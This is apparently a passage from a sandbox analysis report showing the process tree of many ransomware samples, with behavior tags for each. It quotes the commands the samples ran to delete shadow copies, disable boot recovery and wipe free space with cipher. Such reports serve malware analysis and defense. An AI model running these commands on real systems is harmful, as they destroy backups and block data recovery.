        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:17048
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:17188
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:17256
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:15716
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:15752
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:15548
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:15432
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:18012
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:18384
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:18160
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:18492
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:18572
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:18820
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
        5⤵
        
        PID:19004
- - C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Blocker.kqop-3f676db33adaf46dad27d55cc99aa0038629429ace0b56dce8ae5a9c852ea1b4.exe
    Trojan-Ransom.Win32.Blocker.kqop-3f676db33adaf46dad27d55cc99aa0038629429ace0b56dce8ae5a9c852ea1b4.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1800
  - - C:\ProgramData\svhost.exe
      "C:\ProgramData\svhost.exe"
      4⤵
      Looks for VMWare services registry key.
      Executes dropped EXE
      Adds Run key to start application
      Checks whether UAC is enabled
      Maps connected drives based on registry
      PID:3860
- - C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Blocker.meia-8179d0b5e1307621aa793c502a89ac3b7aba833f3b4fc815f99d0dbc85aa7c06.exe
    Trojan-Ransom.Win32.Blocker.meia-8179d0b5e1307621aa793c502a89ac3b7aba833f3b4fc815f99d0dbc85aa7c06.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: MapViewOfSection
    PID:1284
  - - C:\Windows\SysWOW64\explorer.exe
      "C:\Windows\system32\explorer.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2060
- - C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exe
    Trojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exe
    3⤵
    - Looks for VMWare services registry key.
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks whether UAC is enabled
    - Maps connected drives based on registry
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: MapViewOfSection
    PID:1164
  - - C:\Windows\SysWOW64\wbem\WMIC.exe
      "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1544
  - - C:\Users\Admin\AppData\Roaming\Ytviat\zeise.exe
      "C:\Users\Admin\AppData\Roaming\Ytviat\zeise.exe"
      4⤵
      Looks for VMWare services registry key.
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      Checks whether UAC is enabled
      Maps connected drives based on registry
      Sets desktop wallpaper using registry
      Modifies registry class
      Suspicious behavior: MapViewOfSection
      PID:4936
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\[HOW_TO_DECRYPT_FILES].html
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:5704
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5704 CREDAT:275457 /prefetch:2
        6⤵
        Looks for VMWare services registry key.
        Maps connected drives based on registry
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:5760
    - - C:\Windows\SysWOW64\cipher.exe
        
        "C:\Windows\System32\cipher.exe" /W:C
        5⤵
        Looks for VMWare services registry key.
        Maps connected drives based on registry
        System Location Discovery: System Language Discovery
        
        PID:4040
    - - C:\Windows\SysWOW64\cipher.exe
        
        "C:\Windows\System32\cipher.exe" /W:F
        5⤵
        Looks for VMWare services registry key.
        Maps connected drives based on registry
        System Location Discovery: System Language Discovery
        
        PID:6988
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_adf492d3.bat"
        5⤵
        Looks for VMWare services registry key.
        Checks whether UAC is enabled
        Maps connected drives based on registry
        
        PID:6520
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic process call create "cmd.exe /c bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & vssadmin.exe delete shadows /all /quiet & net stop vss"
        6⤵
        Looks for VMWare services registry key.
        Checks whether UAC is enabled
        Maps connected drives based on registry
        System Location Discovery: System Language Discovery
        
        PID:5412
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_640ef11e.bat"
        5⤵
        
        PID:2168
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_b3ac6a53.bat"
      4⤵
      Looks for VMWare services registry key.
      Checks whether UAC is enabled
      Maps connected drives based on registry
      PID:4560
- - C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Foreign.nxqg-f41d6da3b7da9c73e404c7e8142d7c4ef60d950e6034bf76286d8bc33fde4f55.exe
    Trojan-Ransom.Win32.Foreign.nxqg-f41d6da3b7da9c73e404c7e8142d7c4ef60d950e6034bf76286d8bc33fde4f55.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1708
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\246C\AF4E.bat" "C:\Users\Admin\AppData\Roaming\MICROS~1\Asfeprov\adsnobby.exe" "C:\Users\Admin\Desktop\00310\TR5FA8~1.EXE""
      4⤵
      System Location Discovery: System Language Discovery
      PID:3968
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /C ""C:\Users\Admin\AppData\Roaming\MICROS~1\Asfeprov\adsnobby.exe" "C:\Users\Admin\Desktop\00310\TR5FA8~1.EXE""
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2860
      - C:\Users\Admin\AppData\Roaming\MICROS~1\Asfeprov\adsnobby.exe
        
        "C:\Users\Admin\AppData\Roaming\MICROS~1\Asfeprov\adsnobby.exe" "C:\Users\Admin\Desktop\00310\TR5FA8~1.EXE"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:4768
        
        C:\Windows\system32\svchost.exe
        
        C:\Windows\system32\svchost.exe
        7⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        
        PID:3724
- - C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exe
    Trojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exe
    3⤵
    - Looks for VMWare services registry key.
    - Executes dropped EXE
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Maps connected drives based on registry
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of SetWindowsHookEx
    PID:1088
- - C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exe
    Trojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exe
    3⤵
    - Looks for VMWare services registry key.
    - Executes dropped EXE
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Maps connected drives based on registry
    - System Location Discovery: System Language Discovery
    - Modifies Control Panel
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    PID:2652
  - - C:\Windows\SysWOW64\explorer.exe
      explorer.exe
      4⤵
      Looks for VMWare services registry key.
      Adds Run key to start application
      Maps connected drives based on registry
      System Location Discovery: System Language Discovery
      PID:2788
- - C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe
    Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe
    3⤵
    - Looks for VMWare services registry key.
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Enumerates connected drives
    - Maps connected drives based on registry
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:1368
  - - C:\Windows\SysWOW64\msiexec.exe
      msiexec.exe
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: GetForegroundWindowSpam
      PID:1684
- - C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Foreign.nylp-19e0727b00b01ff02b6b60c1356cf24d688a35ee1b3c2792181849da6dd23a0c.exe
    Trojan-Ransom.Win32.Foreign.nylp-19e0727b00b01ff02b6b60c1356cf24d688a35ee1b3c2792181849da6dd23a0c.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Enumerates connected drives
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1056
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\6A76\B53B.bat" "C:\Users\Admin\AppData\Roaming\drprssec\chtbider.exe" "C:\Users\Admin\Desktop\00310\TR788B~1.EXE""
      4⤵
      System Location Discovery: System Language Discovery
      PID:6456
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /C ""C:\Users\Admin\AppData\Roaming\drprssec\chtbider.exe" "C:\Users\Admin\Desktop\00310\TR788B~1.EXE""
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:5592
      - C:\Users\Admin\AppData\Roaming\drprssec\chtbider.exe
        
        "C:\Users\Admin\AppData\Roaming\drprssec\chtbider.exe" "C:\Users\Admin\Desktop\00310\TR788B~1.EXE"
        6⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        
        PID:4076
        
        C:\Windows\system32\svchost.exe
        
        C:\Windows\system32\svchost.exe
        7⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        
        PID:1480
- - C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe
    Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe
    3⤵
    - Looks for VMWare services registry key.
    - Executes dropped EXE
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Maps connected drives based on registry
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1840
- - C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exe
    Trojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2816
- - C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.exe
    Trojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.exe
    3⤵
    - Looks for VMWare services registry key.
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks whether UAC is enabled
    - Maps connected drives based on registry
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: MapViewOfSection
    PID:2776
  - - C:\Windows\SysWOW64\wbem\WMIC.exe
      "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3012
  - - C:\Users\Admin\AppData\Roaming\Ihtu\qiyg.exe
      "C:\Users\Admin\AppData\Roaming\Ihtu\qiyg.exe"
      4⤵
      Looks for VMWare services registry key.
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      Checks whether UAC is enabled
      Maps connected drives based on registry
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      PID:6160
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\[HOW_TO_DECRYPT_FILES].html
        5⤵
        
        PID:2904
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2904 CREDAT:275457 /prefetch:2
        6⤵
        
        PID:7000
    - - C:\Windows\SysWOW64\cipher.exe
        
        "C:\Windows\System32\cipher.exe" /W:C
        5⤵
        
        PID:1468
    - - C:\Windows\SysWOW64\cipher.exe
        
        "C:\Windows\System32\cipher.exe" /W:F
        5⤵
        
        PID:4748
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_84a6b1cd.bat"
        5⤵
        
        PID:6984
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic process call create "cmd.exe /c bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & vssadmin.exe delete shadows /all /quiet & net stop vss"
        6⤵
        
        PID:2872
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_55bec46f.bat"
        5⤵
        
        PID:7820
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_6ab60f9a.bat"
      4⤵
      Looks for VMWare services registry key.
      Checks whether UAC is enabled
      Maps connected drives based on registry
      System Location Discovery: System Language Discovery
      PID:7108
- - C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe
    Trojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of SetWindowsHookEx
    PID:1436
  - - C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe
      Trojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1388
    - - C:\Users\Admin\AppData\Roaming\TeamViewer\Tsojan-Rantom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe
        
        C:\Users\Admin\AppData\Roaming\TeamViewer\Tsojan-Rantom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of SetWindowsHookEx
        
        PID:1144
      - C:\Users\Admin\AppData\Roaming\TeamViewer\Tsojan-Rantom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe
        
        C:\Users\Admin\AppData\Roaming\TeamViewer\Tsojan-Rantom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe
        6⤵
        Executes dropped EXE
        
        PID:2580
        
        C:\Windows\system32\svchost.exe
        
        C:\Windows\system32\svchost.exe -k netsvcs
        7⤵
        Windows security bypass
        
        PID:2760
- - C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exe
    Trojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exe
    3⤵
    - Looks for VMWare Tools registry key
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    PID:2168
  - - C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exe
      Trojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1512
    - - C:\Users\Admin\AppData\Roaming\Yqpei\semo.exe
        
        "C:\Users\Admin\AppData\Roaming\Yqpei\semo.exe"
        5⤵
        Looks for VMWare Tools registry key
        Checks BIOS information in registry
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:3036
      - C:\Users\Admin\AppData\Roaming\Yqpei\semo.exe
        
        "C:\Users\Admin\AppData\Roaming\Yqpei\semo.exe"
        6⤵
        Executes dropped EXE
        
        PID:2996
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_12cb4525.bat"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2916
- - C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
    Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2948
  - - C:\WINDOWS\tasksche.exe
      C:\WINDOWS\tasksche.exe /i
      4⤵
      Executes dropped EXE
      PID:3160
- - C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Wanna.zbu-0e7b6931a19969d9f5329d5a0f91e10982cdf30aa6de3673818468e2c58e3d37.exe
    Trojan-Ransom.Win32.Wanna.zbu-0e7b6931a19969d9f5329d5a0f91e10982cdf30aa6de3673818468e2c58e3d37.exe
    3⤵
    - Executes dropped EXE
    PID:468
- C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Wanna.zbu-0e7b6931a19969d9f5329d5a0f91e10982cdf30aa6de3673818468e2c58e3d37.exe
  "C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Wanna.zbu-0e7b6931a19969d9f5329d5a0f91e10982cdf30aa6de3673818468e2c58e3d37.exe"
  2⤵
  - Executes dropped EXE
  PID:6328
- C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
  "C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:5136
- - C:\WINDOWS\tasksche.exe
    C:\WINDOWS\tasksche.exe /i
    3⤵
    - Executes dropped EXE
    PID:5532
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\C428.bi1"
  2⤵
  PID:3652
- - C:\Windows\system32\nslookup.exe
    nslookup myip.opendns.com resolver1.opendns.com
    3⤵
    PID:3284
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C428.bi1"
  2⤵
  PID:4896
- C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe
  "C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1552
- C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe
  "C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe"
  2⤵
  - Looks for VMWare services registry key.
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Maps connected drives based on registry
  - System Location Discovery: System Language Discovery
  PID:2184
- C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe
  "C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe"
  2⤵
  - Looks for VMWare services registry key.
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Enumerates connected drives
  - Maps connected drives based on registry
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4088
- - C:\Windows\SysWOW64\msiexec.exe
    msiexec.exe
    3⤵
    PID:2084
- C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exe
  "C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exe"
  2⤵
  - Looks for VMWare services registry key.
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Maps connected drives based on registry
  - Suspicious use of SetWindowsHookEx
  PID:2992
- C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Blocker.kqop-3f676db33adaf46dad27d55cc99aa0038629429ace0b56dce8ae5a9c852ea1b4.exe
  "C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Blocker.kqop-3f676db33adaf46dad27d55cc99aa0038629429ace0b56dce8ae5a9c852ea1b4.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5192
- C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.AutoIt.vmt-c784f66acca1526d24bc7b70bcd1b19cbf002f0f391311a21aeb0b91b8ca6d96.exe
  "C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.AutoIt.vmt-c784f66acca1526d24bc7b70bcd1b19cbf002f0f391311a21aeb0b91b8ca6d96.exe"
  2⤵
  PID:7020
- - C:\ProgramData\IIXguS.exe
    "C:\ProgramData\IIXguS.exe" C:\ProgramData\IIXguS.au3
    3⤵
    PID:4784
  - - C:\Windows\SysWOW64\ipconfig.exe
      "C:\Windows\System32\ipconfig.exe" /release *
      4⤵
      Gathers network information
      PID:6840
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
      4⤵
      PID:4056
  - - C:\Windows\SysWOW64\ipconfig.exe
      "C:\Windows\System32\ipconfig.exe" /renew *
      4⤵
      Gathers network information
      PID:2420
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:6660
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:5352
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:1656
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:5928
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:1364
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:3308
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:5656
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:2696
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:6112
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:2320
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:4840
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:6384
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:3168
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:5628
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:5460
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:4880
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:4256
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:6420
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:6652
    - - C:\Windows\SysWOW64\WScript.exe
        
